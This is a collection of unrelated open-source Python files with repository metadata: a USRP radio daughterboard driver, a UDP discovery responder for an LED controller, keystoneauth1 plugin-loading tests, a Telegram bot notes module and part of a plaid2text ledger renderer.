def _compute_regs(self, freq):
"""
Determine values of R, control, and N registers, along with actual freq.
@param freq: target frequency in Hz
@type freq: float
@returns: (R, N, control, actual_freq)
@rtype: tuple(int, int, int, float)
"""
# Band-specific N-Register Values
phdet_freq = self._refclk_freq()/self.R_DIV
print "phdet_freq = %f" % (phdet_freq,)
desired_n = round(freq*self.freq_mult/phdet_freq)
print "desired_n %f" % (desired_n,)
actual_freq = desired_n * phdet_freq
print "actual freq %f" % (actual_freq,)
B = math.floor(desired_n/self._prescaler())
A = desired_n - self._prescaler()*B
print "A %d B %d" % (A,B)
self.B_DIV = int(B) # bits 20:8
self.A_DIV = int(A) # bit 6:2
#assert self.B_DIV >= self.A_DIV
if self.B_DIV < self.A_DIV:
return (0,0,0,0)
R = (self.R_RSV<<21) | (self.LDP<<20) | (self.TEST<<18) | \
(self.ABP<<16) | (self.R_DIV<<2)
N = (self.N_RSV<<22) | (self.CP_GAIN<<21) | (self.B_DIV<<8) | (self.A_DIV<<2)
control = (self.P<<22) | (self.PD2<<21) | (self.CP2<<18) | (self.CP1<<15) | \
(self.TC<<11) | (self.FL<<9) | (self.CP3S<<8) | (self.PDP<<7) | \
(self.MUXOUT<<4) | (self.PD1<<3) | (self.CR<<2)
return (R,N,control,actual_freq/self.freq_mult)
def _write_all(self, R, N, control):
"""
Write all PLL registers:
R counter latch,
N counter latch,
Function latch,
Initialization latch
Adds 10ms delay between writing control and N if this is first call.
This is the required power-up sequence.
@param R: 24-bit R counter latch
@type R: int
@param N: 24-bit N counter latch
@type N: int
@param control: 24-bit control latch
@type control: int
"""
self._write_R(R)
self._write_func(control)
self._write_init(control)
if self.first:
time.sleep(0.010)
self.first = False
self._write_N(N)
def _write_R(self, R):
self._write_it((R & ~0x3) | 0)
def _write_N(self, N):
self._write_it((N & ~0x3) | 1)
def _write_func(self, func):
self._write_it((func & ~0x3) | 2)
def _write_init(self, init):
self._write_it((init & ~0x3) | 3)
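    # The two LSBs of each 24-bit SPI word select the ADF410x latch:
    # 0 = R counter, 1 = N counter, 2 = function latch, 3 = initialization latch.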
def _write_it(self, v):
s = ''.join((chr((v >> 16) & 0xff),
chr((v >> 8) & 0xff),
chr(v & 0xff)))
self._u._write_spi(0, self.spi_enable, self.spi_format, s)
def _prescaler(self):
if self.P == 0:
return 8
elif self.P == 1:
return 16
elif self.P == 2:
return 32
elif self.P == 3:
return 64
else:
raise ValueError, "Prescaler out of range"
#----------------------------------------------------------------------
class _lo_common(_ADF410X_common):
def __init__(self):
_ADF410X_common.__init__(self)
# Band-specific R-Register Values
self.R_DIV = 4 # bits 15:2
# Band-specific C-Register values
self.P = 0 # bits 23,22 0 = Div by 8/9
self.CP2 = 7 # bits 19:17
self.CP1 = 7 # bits 16:14
# Band specifc N-Register Values
self.DIVSEL = 0 # bit 23
self.DIV2 = 0 # bit 22
self.CPGAIN = 0 # bit 21
self.freq_mult = 1
        self.main_div = 0  # encoded value for a main divider of 1; updated by set_divider()
self.aux_div = 2
def freq_range(self): # FIXME
return (50e6, 1000e6, 16e6)
def set_divider(self, main_or_aux, divisor):
if main_or_aux not in (0, 'main', 1, 'aux'):
raise ValueError, "main_or_aux must be 'main' or 'aux'"
if main_or_aux in (0, 'main'):
if divisor not in (1,2,4,8):
raise ValueError, "Main Divider Must be 1, 2, 4, or 8"
for (div,val) in ((1,0),(2,1),(4,2),(8,3)):
if(div == divisor):
self.main_div = val
else:
if divisor not in (2,4,8,16):
raise ValueError, "Aux Divider Must be 2, 4, 8 or 16"
for (div,val) in ((2,0),(4,1),(8,2),(16,3)):
if(div == divisor):
self.aux_div = val
        vala = self.main_div*SELA0
        valb = self.aux_div*SELB0
        mask = SELA0|SELA1|SELB0|SELB1
        self._rx_write_io(vala | valb, mask)
def set_freq(self, freq):
#freq += self._lo_offset
if(freq < 20e6 or freq > 1200e6):
raise ValueError, "Requested frequency out of range"
div = 1
lo_freq = freq * 2
while lo_freq < 1e9 and div < 8:
div = div * 2
lo_freq = lo_freq * 2
print "For RF freq of %f, we set DIV=%d and LO Freq=%f" % (freq, div, lo_freq)
self.set_divider('main', div)
self.set_divider('aux', div*2)
R, N, control, actual_freq = self._compute_regs(lo_freq)
print "R %d N %d control %d actual freq %f" % (R,N,control,actual_freq)
if R==0:
return(False,0)
self._write_all(R, N, control)
return (self._lock_detect(), actual_freq/div/2)
#------------------------------------------------------------
class db_wbx_lo_tx(_lo_common, wbx_base_tx):
def __init__(self, usrp, which):
wbx_base_tx.__init__(self, usrp, which)
_lo_common.__init__(self)
def gain_range(self):
"""
Return range of gain that can be set by this d'board.
@returns (min_gain, max_gain, step_size)
Where gains are expressed in decibels (your mileage may vary)
Gain is controlled by a VGA in the output amplifier, not the PGA
"""
return (-56, 0, 0.1)
def set_gain(self, gain):
"""
Set the gain.
@param gain: gain in decibels
@returns True/False
"""
maxgain = self.gain_range()[1]
mingain = self.gain_range()[0]
if gain > maxgain:
txvga_gain = maxgain
elif gain < mingain:
txvga_gain = mingain
else:
txvga_gain = gain
V_maxgain = 1.4
V_mingain = 0.1
V_fullscale = 3.3
dac_value = ((txvga_gain-mingain)*(V_maxgain-V_mingain)/(maxgain-mingain) + V_mingain)*4096/V_fullscale
assert dac_value>=0 and dac_value<4096
print "DAC value %d" % (dac_value,)
return self._u.write_aux_dac(self._which, 1, int(dac_value))
class db_wbx_lo_rx(_lo_common, wbx_base_rx):
def __init__(self, usrp, which):
wbx_base_rx.__init__(self, usrp, which)
_lo_common.__init__(self)
def gain_range(self):
"""
Return range of gain that can be set by this d'board.
@returns (min_gain, max_gain, step_size)
Where gains are expressed in decibels (your mileage may vary)
"""
return (self._u.pga_min(), self._u.pga_max() + 45, 0.05)
#------------------------------------------------------------
# hook these daughterboard classes into the auto-instantiation framework
db_instantiator.add(usrp_dbid.WBX_LO_TX, lambda usrp, which : (db_wbx_lo_tx(usrp, which),))
db_instantiator.add(usrp_dbid.WBX_LO_RX, lambda usrp, which : (db_wbx_lo_rx(usrp, which),))
|
trnewman/VT-USRP-daughterboard-drivers_python
|
gr-usrp/src/db_wbx.py
|
Python
|
gpl-3.0
| 20,483
|
#!/usr/bin/env python
import socket
# Set admin server settings
UDP_IP = '' # Leave empty for Broadcast support
ADMIN_PORT = 48899
# Local settings of your Raspberry Pi, used for app discovery
INT_IP = '10.0.1.61'
INT_MAC = '111a02bf232b'
# Code Starts Here #
# Create UDP socket, bind to it
adminsock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
adminsock.bind((UDP_IP, ADMIN_PORT))
# Loop forever
while True:
admindata, adminaddr = adminsock.recvfrom(64) # buffer size is 64 bytes
# Did we get a message?
if admindata is not None:
# print("admin command: ", str(admindata)) # Debugging
# If the client app is syncing to a unit
if str(admindata).find("Link_Wi-Fi") != -1:
RETURN = INT_IP + ',' + INT_MAC + ',' # Return our IP/MAC
# print("admin return: ", RETURN) # Debugging
adminsock.sendto(bytes(RETURN, "utf-8"),adminaddr) # Send Response
else:
adminsock.sendto(bytes('+ok', "utf-8"),adminaddr) # Send OK for each packet we get
else:
break
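# A minimal client sketch (hypothetical; run from another machine on the same
# network) to exercise the sync path above:
#     import socket
#     s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#     s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
#     s.sendto(b"Link_Wi-Fi", ("255.255.255.255", 48899))
#     print(s.recvfrom(64))  # expect b"<INT_IP>,<INT_MAC>,"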
|
ep1cman/RFLED-Server
|
source/admin.py
|
Python
|
gpl-3.0
| 1,061
|
#!/usr/bin/env python3
import fstimer.fslogger
import fstimer.timer
from gi.repository import Gtk
def main():
pytimer = fstimer.timer.PyTimer()
Gtk.main()
if __name__ == '__main__':
main()
|
bletham/fstimer
|
fstimer.py
|
Python
|
gpl-3.0
| 206
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
import uuid
from keystoneauth1 import exceptions
from keystoneauth1 import loading
from keystoneauth1.tests.unit.loading import utils
class V3PasswordTests(utils.TestCase):
def setUp(self):
super(V3PasswordTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3password')
return loader.load_from_options(**kwargs)
def test_basic(self):
username = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
password = uuid.uuid4().hex
project_name = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
p = self.create(username=username,
user_domain_id=user_domain_id,
project_name=project_name,
project_domain_id=project_domain_id,
password=password)
pw_method = p.auth_methods[0]
self.assertEqual(username, pw_method.username)
self.assertEqual(user_domain_id, pw_method.user_domain_id)
self.assertEqual(password, pw_method.password)
self.assertEqual(project_name, p.project_name)
self.assertEqual(project_domain_id, p.project_domain_id)
def test_without_user_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex)
def test_without_project_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
password=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex,
project_name=uuid.uuid4().hex)
class TOTPTests(utils.TestCase):
def setUp(self):
super(TOTPTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3totp')
return loader.load_from_options(**kwargs)
def test_basic(self):
username = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
# passcode is 6 digits
passcode = ''.join(str(random.randint(0, 9)) for x in range(6))
project_name = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
p = self.create(username=username,
user_domain_id=user_domain_id,
project_name=project_name,
project_domain_id=project_domain_id,
passcode=passcode)
totp_method = p.auth_methods[0]
self.assertEqual(username, totp_method.username)
self.assertEqual(user_domain_id, totp_method.user_domain_id)
self.assertEqual(passcode, totp_method.passcode)
self.assertEqual(project_name, p.project_name)
self.assertEqual(project_domain_id, p.project_domain_id)
def test_without_user_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
passcode=uuid.uuid4().hex)
def test_without_project_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
passcode=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex,
project_name=uuid.uuid4().hex)
class OpenIDConnectBaseTests(object):
plugin_name = None
def setUp(self):
super(OpenIDConnectBaseTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader(self.plugin_name)
return loader.load_from_options(**kwargs)
def test_base_options_are_there(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['client-id', 'client-secret', 'access-token-endpoint',
'access-token-type', 'openid-scope',
'discovery-endpoint']).issubset(
set([o.name for o in options]))
)
# openid-scope gets renamed into "scope"
self.assertIn('scope', [o.dest for o in options])
class OpenIDConnectClientCredentialsTests(OpenIDConnectBaseTests,
utils.TestCase):
plugin_name = "v3oidcclientcredentials"
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['openid-scope']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token_endpoint = uuid.uuid4().hex
        identity_provider = uuid.uuid4().hex
        protocol = uuid.uuid4().hex
        scope = uuid.uuid4().hex
client_id = uuid.uuid4().hex
client_secret = uuid.uuid4().hex
oidc = self.create(identity_provider=identity_provider,
protocol=protocol,
access_token_endpoint=access_token_endpoint,
client_id=client_id,
client_secret=client_secret,
scope=scope)
self.assertEqual(scope, oidc.scope)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token_endpoint, oidc.access_token_endpoint)
self.assertEqual(client_id, oidc.client_id)
self.assertEqual(client_secret, oidc.client_secret)
class OpenIDConnectPasswordTests(OpenIDConnectBaseTests, utils.TestCase):
plugin_name = "v3oidcpassword"
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['username', 'password', 'openid-scope']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token_endpoint = uuid.uuid4().hex
username = uuid.uuid4().hex
password = uuid.uuid4().hex
        identity_provider = uuid.uuid4().hex
        protocol = uuid.uuid4().hex
        scope = uuid.uuid4().hex
client_id = uuid.uuid4().hex
client_secret = uuid.uuid4().hex
oidc = self.create(username=username,
password=password,
identity_provider=identity_provider,
protocol=protocol,
access_token_endpoint=access_token_endpoint,
client_id=client_id,
client_secret=client_secret,
scope=scope)
self.assertEqual(username, oidc.username)
self.assertEqual(password, oidc.password)
self.assertEqual(scope, oidc.scope)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token_endpoint, oidc.access_token_endpoint)
self.assertEqual(client_id, oidc.client_id)
self.assertEqual(client_secret, oidc.client_secret)
class OpenIDConnectAuthCodeTests(OpenIDConnectBaseTests, utils.TestCase):
plugin_name = "v3oidcauthcode"
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['redirect-uri', 'code']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token_endpoint = uuid.uuid4().hex
redirect_uri = uuid.uuid4().hex
authorization_code = uuid.uuid4().hex
scope = uuid.uuid4().hex
identity_provider = uuid.uuid4().hex
protocol = uuid.uuid4().hex
client_id = uuid.uuid4().hex
client_secret = uuid.uuid4().hex
oidc = self.create(code=authorization_code,
redirect_uri=redirect_uri,
identity_provider=identity_provider,
protocol=protocol,
access_token_endpoint=access_token_endpoint,
client_id=client_id,
client_secret=client_secret,
scope=scope)
self.assertEqual(redirect_uri, oidc.redirect_uri)
self.assertEqual(authorization_code, oidc.code)
self.assertEqual(scope, oidc.scope)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token_endpoint, oidc.access_token_endpoint)
self.assertEqual(client_id, oidc.client_id)
self.assertEqual(client_secret, oidc.client_secret)
class OpenIDConnectAccessToken(utils.TestCase):
plugin_name = "v3oidcaccesstoken"
def setUp(self):
super(OpenIDConnectAccessToken, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader(self.plugin_name)
return loader.load_from_options(**kwargs)
def test_options(self):
options = loading.get_plugin_loader(self.plugin_name).get_options()
self.assertTrue(
set(['access-token']).issubset(
set([o.name for o in options]))
)
def test_basic(self):
access_token = uuid.uuid4().hex
identity_provider = uuid.uuid4().hex
protocol = uuid.uuid4().hex
oidc = self.create(access_token=access_token,
identity_provider=identity_provider,
protocol=protocol)
self.assertEqual(identity_provider, oidc.identity_provider)
self.assertEqual(protocol, oidc.protocol)
self.assertEqual(access_token, oidc.access_token)
class V3TokenlessAuthTests(utils.TestCase):
def setUp(self):
super(V3TokenlessAuthTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3tokenlessauth')
return loader.load_from_options(**kwargs)
def test_basic(self):
domain_id = uuid.uuid4().hex
domain_name = uuid.uuid4().hex
project_id = uuid.uuid4().hex
project_name = uuid.uuid4().hex
project_domain_id = uuid.uuid4().hex
project_domain_name = uuid.uuid4().hex
tla = self.create(domain_id=domain_id,
domain_name=domain_name,
project_id=project_id,
project_name=project_name,
project_domain_id=project_domain_id,
project_domain_name=project_domain_name)
self.assertEqual(domain_id, tla.domain_id)
self.assertEqual(domain_name, tla.domain_name)
self.assertEqual(project_id, tla.project_id)
self.assertEqual(project_name, tla.project_name)
self.assertEqual(project_domain_id, tla.project_domain_id)
self.assertEqual(project_domain_name, tla.project_domain_name)
def test_missing_parameters(self):
self.assertRaises(exceptions.OptionError,
self.create,
domain_id=None)
self.assertRaises(exceptions.OptionError,
self.create,
domain_name=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_id=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_name=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_id=None)
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_name=None)
        # project_domain_id is only used to uniquely identify the project
        # when a project_name is also provided; it is an invalid option
        # all by itself.
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_id=uuid.uuid4().hex)
        # project_domain_name is only used to uniquely identify the project
        # when a project_name is also provided; it is an invalid option
        # all by itself.
self.assertRaises(exceptions.OptionError,
self.create,
project_domain_name=uuid.uuid4().hex)
self.assertRaises(exceptions.OptionError,
self.create,
project_name=uuid.uuid4().hex)
class V3ApplicationCredentialTests(utils.TestCase):
def setUp(self):
super(V3ApplicationCredentialTests, self).setUp()
self.auth_url = uuid.uuid4().hex
def create(self, **kwargs):
kwargs.setdefault('auth_url', self.auth_url)
loader = loading.get_plugin_loader('v3applicationcredential')
return loader.load_from_options(**kwargs)
def test_basic(self):
id = uuid.uuid4().hex
secret = uuid.uuid4().hex
app_cred = self.create(application_credential_id=id,
application_credential_secret=secret)
ac_method = app_cred.auth_methods[0]
self.assertEqual(id, ac_method.application_credential_id)
self.assertEqual(secret, ac_method.application_credential_secret)
def test_with_name(self):
name = uuid.uuid4().hex
secret = uuid.uuid4().hex
username = uuid.uuid4().hex
user_domain_id = uuid.uuid4().hex
app_cred = self.create(application_credential_name=name,
application_credential_secret=secret,
username=username,
user_domain_id=user_domain_id)
ac_method = app_cred.auth_methods[0]
self.assertEqual(name, ac_method.application_credential_name)
self.assertEqual(secret, ac_method.application_credential_secret)
self.assertEqual(username, ac_method.username)
self.assertEqual(user_domain_id, ac_method.user_domain_id)
def test_without_user_domain(self):
self.assertRaises(exceptions.OptionError,
self.create,
application_credential_name=uuid.uuid4().hex,
username=uuid.uuid4().hex,
application_credential_secret=uuid.uuid4().hex)
def test_without_name_or_id(self):
self.assertRaises(exceptions.OptionError,
self.create,
username=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex,
application_credential_secret=uuid.uuid4().hex)
def test_without_secret(self):
self.assertRaises(exceptions.OptionError,
self.create,
application_credential_id=uuid.uuid4().hex,
username=uuid.uuid4().hex,
user_domain_id=uuid.uuid4().hex)
|
ctrlaltdel/neutrinator
|
vendor/keystoneauth1/tests/unit/loading/test_v3.py
|
Python
|
gpl-3.0
| 16,308
|
import re
from io import BytesIO
from typing import Optional, List
from telegram import MAX_MESSAGE_LENGTH, ParseMode, InlineKeyboardMarkup
from telegram import Message, Update, Bot
from telegram.error import BadRequest
from telegram.ext import CommandHandler, RegexHandler
from telegram.ext.dispatcher import run_async
from telegram.utils.helpers import escape_markdown
import tg_bot.modules.sql.notes_sql as sql
from tg_bot import dispatcher, MESSAGE_DUMP, LOGGER
from tg_bot.modules.disable import DisableAbleCommandHandler
from tg_bot.modules.helper_funcs.chat_status import user_admin
from tg_bot.modules.helper_funcs.misc import build_keyboard, revert_buttons
from tg_bot.modules.helper_funcs.msg_types import get_note_type
FILE_MATCHER = re.compile(r"^###file_id(!photo)?###:(.*?)(?:\s|$)")
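# Matches import markers such as "###file_id###:<id>" or
# "###file_id!photo###:<id>" that other bots prepend to exported notes.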
ENUM_FUNC_MAP = {
sql.Types.TEXT.value: dispatcher.bot.send_message,
sql.Types.BUTTON_TEXT.value: dispatcher.bot.send_message,
sql.Types.STICKER.value: dispatcher.bot.send_sticker,
sql.Types.DOCUMENT.value: dispatcher.bot.send_document,
sql.Types.PHOTO.value: dispatcher.bot.send_photo,
sql.Types.AUDIO.value: dispatcher.bot.send_audio,
sql.Types.VOICE.value: dispatcher.bot.send_voice,
sql.Types.VIDEO.value: dispatcher.bot.send_video
}
# Do not async
def get(bot, update, notename, show_none=True, no_format=False):
chat_id = update.effective_chat.id
note = sql.get_note(chat_id, notename)
message = update.effective_message # type: Optional[Message]
if note:
# If we're replying to a message, reply to that message (unless it's an error)
if message.reply_to_message:
reply_id = message.reply_to_message.message_id
else:
reply_id = message.message_id
if note.is_reply:
if MESSAGE_DUMP:
try:
bot.forward_message(chat_id=chat_id, from_chat_id=MESSAGE_DUMP, message_id=note.value)
except BadRequest as excp:
if excp.message == "Message to forward not found":
message.reply_text("This message seems to have been lost - I'll remove it "
"from your notes list.")
sql.rm_note(chat_id, notename)
else:
raise
else:
try:
bot.forward_message(chat_id=chat_id, from_chat_id=chat_id, message_id=note.value)
except BadRequest as excp:
if excp.message == "Message to forward not found":
message.reply_text("Looks like the original sender of this note has deleted "
"their message - sorry! Get your bot admin to start using a "
"message dump to avoid this. I'll remove this note from "
"your saved notes.")
sql.rm_note(chat_id, notename)
else:
raise
else:
text = note.value
keyb = []
parseMode = ParseMode.MARKDOWN
buttons = sql.get_buttons(chat_id, notename)
if no_format:
parseMode = None
text += revert_buttons(buttons)
else:
keyb = build_keyboard(buttons)
keyboard = InlineKeyboardMarkup(keyb)
try:
if note.msgtype in (sql.Types.BUTTON_TEXT, sql.Types.TEXT):
bot.send_message(chat_id, text, reply_to_message_id=reply_id,
parse_mode=parseMode, disable_web_page_preview=True,
reply_markup=keyboard)
else:
ENUM_FUNC_MAP[note.msgtype](chat_id, note.file, caption=text, reply_to_message_id=reply_id,
parse_mode=parseMode, disable_web_page_preview=True,
reply_markup=keyboard)
except BadRequest as excp:
if excp.message == "Entity_mention_user_invalid":
message.reply_text("Looks like you tried to mention someone I've never seen before. If you really "
"want to mention them, forward one of their messages to me, and I'll be able "
"to tag them!")
elif FILE_MATCHER.match(note.value):
message.reply_text("This note was an incorrectly imported file from another bot - I can't use "
"it. If you really need it, you'll have to save it again. In "
"the meantime, I'll remove it from your notes list.")
sql.rm_note(chat_id, notename)
else:
message.reply_text("This note could not be sent, as it is incorrectly formatted. Ask in "
"@MarieSupport if you can't figure out why!")
LOGGER.exception("Could not parse message #%s in chat %s", notename, str(chat_id))
LOGGER.warning("Message was: %s", str(note.value))
return
elif show_none:
message.reply_text("This note doesn't exist")
@run_async
def cmd_get(bot: Bot, update: Update, args: List[str]):
if len(args) >= 2 and args[1].lower() == "noformat":
get(bot, update, args[0], show_none=True, no_format=True)
elif len(args) >= 1:
get(bot, update, args[0], show_none=True)
else:
update.effective_message.reply_text("Get rekt")
@run_async
def hash_get(bot: Bot, update: Update):
message = update.effective_message.text
fst_word = message.split()[0]
no_hash = fst_word[1:]
get(bot, update, no_hash, show_none=False)
@run_async
@user_admin
def save(bot: Bot, update: Update):
chat_id = update.effective_chat.id
msg = update.effective_message # type: Optional[Message]
note_name, text, data_type, content, buttons = get_note_type(msg)
if data_type is None:
msg.reply_text("Dude, there's no note")
return
if len(text.strip()) == 0:
text = note_name
sql.add_note_to_db(chat_id, note_name, text, data_type, buttons=buttons, file=content)
msg.reply_text(
"Yas! Added {note_name}.\nGet it with /get {note_name}, or #{note_name}".format(note_name=note_name))
if msg.reply_to_message and msg.reply_to_message.from_user.is_bot:
if text:
msg.reply_text("Seems like you're trying to save a message from a bot. Unfortunately, "
"bots can't forward bot messages, so I can't save the exact message. "
"\nI'll save all the text I can, but if you want more, you'll have to "
"forward the message yourself, and then save it.")
else:
msg.reply_text("Bots are kinda handicapped by telegram, making it hard for bots to "
"interact with other bots, so I can't save this message "
"like I usually would - do you mind forwarding it and "
"then saving that new message? Thanks!")
return
@run_async
@user_admin
def clear(bot: Bot, update: Update, args: List[str]):
chat_id = update.effective_chat.id
if len(args) >= 1:
notename = args[0]
if sql.rm_note(chat_id, notename):
update.effective_message.reply_text("Successfully removed note.")
else:
update.effective_message.reply_text("That's not a note in my database!")
@run_async
def list_notes(bot: Bot, update: Update):
chat_id = update.effective_chat.id
note_list = sql.get_all_chat_notes(chat_id)
msg = "*Notes in chat:*\n"
for note in note_list:
note_name = escape_markdown(" - {}\n".format(note.name))
if len(msg) + len(note_name) > MAX_MESSAGE_LENGTH:
update.effective_message.reply_text(msg, parse_mode=ParseMode.MARKDOWN)
msg = ""
msg += note_name
if msg == "*Notes in chat:*\n":
update.effective_message.reply_text("No notes in this chat!")
elif len(msg) != 0:
update.effective_message.reply_text(msg, parse_mode=ParseMode.MARKDOWN)
def __import_data__(chat_id, data):
failures = []
for notename, notedata in data.get('extra', {}).items():
match = FILE_MATCHER.match(notedata)
if match:
failures.append(notename)
notedata = notedata[match.end():].strip()
if notedata:
sql.add_note_to_db(chat_id, notename[1:], notedata, sql.Types.TEXT)
else:
sql.add_note_to_db(chat_id, notename[1:], notedata, sql.Types.TEXT)
if failures:
with BytesIO(str.encode("\n".join(failures))) as output:
output.name = "failed_imports.txt"
dispatcher.bot.send_document(chat_id, document=output, filename="failed_imports.txt",
caption="These files/photos failed to import due to originating "
"from another bot. This is a telegram API restriction, and can't "
"be avoided. Sorry for the inconvenience!")
def __stats__():
return "{} notes, across {} chats.".format(sql.num_notes(), sql.num_chats())
def __migrate__(old_chat_id, new_chat_id):
sql.migrate_chat(old_chat_id, new_chat_id)
def __chat_settings__(chat_id, user_id):
notes = sql.get_all_chat_notes(chat_id)
return "There are `{}` notes in this chat.".format(len(notes))
__help__ = """
- /get <notename>: get the note with this notename
- #<notename>: same as /get
- /notes or /saved: list all saved notes in this chat
If you would like to retrieve the contents of a note without any formatting, use `/get <notename> noformat`. This can \
be useful when updating a current note.
*Admin only:*
- /save <notename> <notedata>: saves notedata as a note with name notename
A button can be added to a note by using standard markdown link syntax - the link should just be prepended with a \
`buttonurl:` section, as such: `[somelink](buttonurl:example.com)`. Check /markdownhelp for more info.
- /save <notename>: save the replied message as a note with name notename
- /clear <notename>: clear note with this name
"""
__mod_name__ = "Notes"
GET_HANDLER = CommandHandler("get", cmd_get, pass_args=True)
HASH_GET_HANDLER = RegexHandler(r"^#[^\s]+", hash_get)
SAVE_HANDLER = CommandHandler("save", save)
DELETE_HANDLER = CommandHandler("clear", clear, pass_args=True)
LIST_HANDLER = DisableAbleCommandHandler(["notes", "saved"], list_notes, admin_ok=True)
dispatcher.add_handler(GET_HANDLER)
dispatcher.add_handler(SAVE_HANDLER)
dispatcher.add_handler(LIST_HANDLER)
dispatcher.add_handler(DELETE_HANDLER)
dispatcher.add_handler(HASH_GET_HANDLER)
|
PaulSonOfLars/tgbot
|
tg_bot/modules/notes.py
|
Python
|
gpl-3.0
| 11,067
|
#! /usr/bin/env python3
from abc import ABCMeta, abstractmethod
import csv
import os
import re
import subprocess
import sys
import plaid2text.config_manager as cm
from plaid2text.interact import separator_completer, prompt
class Entry:
"""
This represents one entry (transaction) from Plaid.
"""
def __init__(self, transaction, options={}):
"""Parameters:
transaction: a plaid transaction
options: from CLI args and config file
"""
self.options = options
self.transaction = transaction
# TODO: document this
if 'addons' in options:
self.transaction['addons'] = dict(
(k, fields[v - 1]) for k, v in options.addons.items() # NOQA
)
else:
self.transaction['addons'] = {}
# The id for the transaction
self.transaction['transaction_id'] = self.transaction['transaction_id']
# Get the date and convert it into a ledger/beancount formatted date.
d8 = self.transaction['date']
d8_format = options.output_date_format if options and 'output_date_format' in options else '%Y-%m-%d'
self.transaction['transaction_date'] = d8.date().strftime(d8_format)
self.desc = self.transaction['name']
# amnt = self.transaction['amount']
self.transaction['currency'] = options.currency
# self.transaction['debit_amount'] = amnt
# self.transaction['debit_currency'] = currency
# self.transaction['credit_amount'] = ''
# self.transaction['credit_currency'] = ''
self.transaction['posting_account'] = options.posting_account
self.transaction['cleared_character'] = options.cleared_character
if options.template_file:
with open(options.template_file, 'r', encoding='utf-8') as f:
self.transaction['transaction_template'] = f.read()
else:
self.transaction['transaction_template'] = ''
def query(self):
"""
We print a summary of the record on the screen, and allow you to
choose the destination account.
"""
return '{0} {1:<40} {2}'.format(
self.transaction['date'],
self.desc,
self.transaction['amount']
)
def journal_entry(self, payee, account, tags):
"""
Return a formatted journal entry recording this Entry against
the specified posting account
"""
if self.options.output_format == 'ledger':
def_template = cm.DEFAULT_LEDGER_TEMPLATE
else:
def_template = cm.DEFAULT_BEANCOUNT_TEMPLATE
if self.transaction['transaction_template']:
template = (self.transaction['transaction_template'])
else:
template = (def_template)
if self.options.output_format == 'beancount':
ret_tags = ' {}'.format(tags) if tags else ''
else:
ret_tags = ' ; {}'.format(tags) if tags else ''
format_data = {
'associated_account': account,
'payee': payee,
'tags': ret_tags
}
format_data.update(self.transaction['addons'])
format_data.update(self.transaction)
return template.format(**format_data)
class OutputRenderer(metaclass=ABCMeta):
"""
Base class for output rendering.
"""
def __init__(self, transactions, options):
self.transactions = transactions
self.possible_accounts = set([])
self.possible_payees = set([])
self.possible_tags = set([])
self.mappings = []
self.map_file = options.mapping_file
self.read_mapping_file()
self.journal_file = options.journal_file
self.journal_lines = []
self.options = options
self.get_possible_accounts_and_payees()
# Add payees/accounts/tags from mappings
for m in self.mappings:
self.possible_payees.add(m[1])
self.possible_accounts.add(m[2])
if m[3]:
if options.output_format == 'ledger':
self.possible_tags.update(set(m[3][0].split(':')))
else:
self.possible_tags.update([t.replace('#', '') for t in m[3][0].split(' ')])
def read_mapping_file(self):
"""
        Mappings are a CSV file with at least three columns.
        The first is a string to be matched against an entry description.
        The second is the payee against which such entries should be posted.
        The third is the account against which such entries should be posted.
        Any further columns are read as tags.
        If the match string begins and ends with '/' it is taken to be a
        regular expression.
"""
if not self.map_file:
return
with open(self.map_file, 'r', encoding='utf-8', newline='') as f:
map_reader = csv.reader(f)
for row in map_reader:
if len(row) > 1:
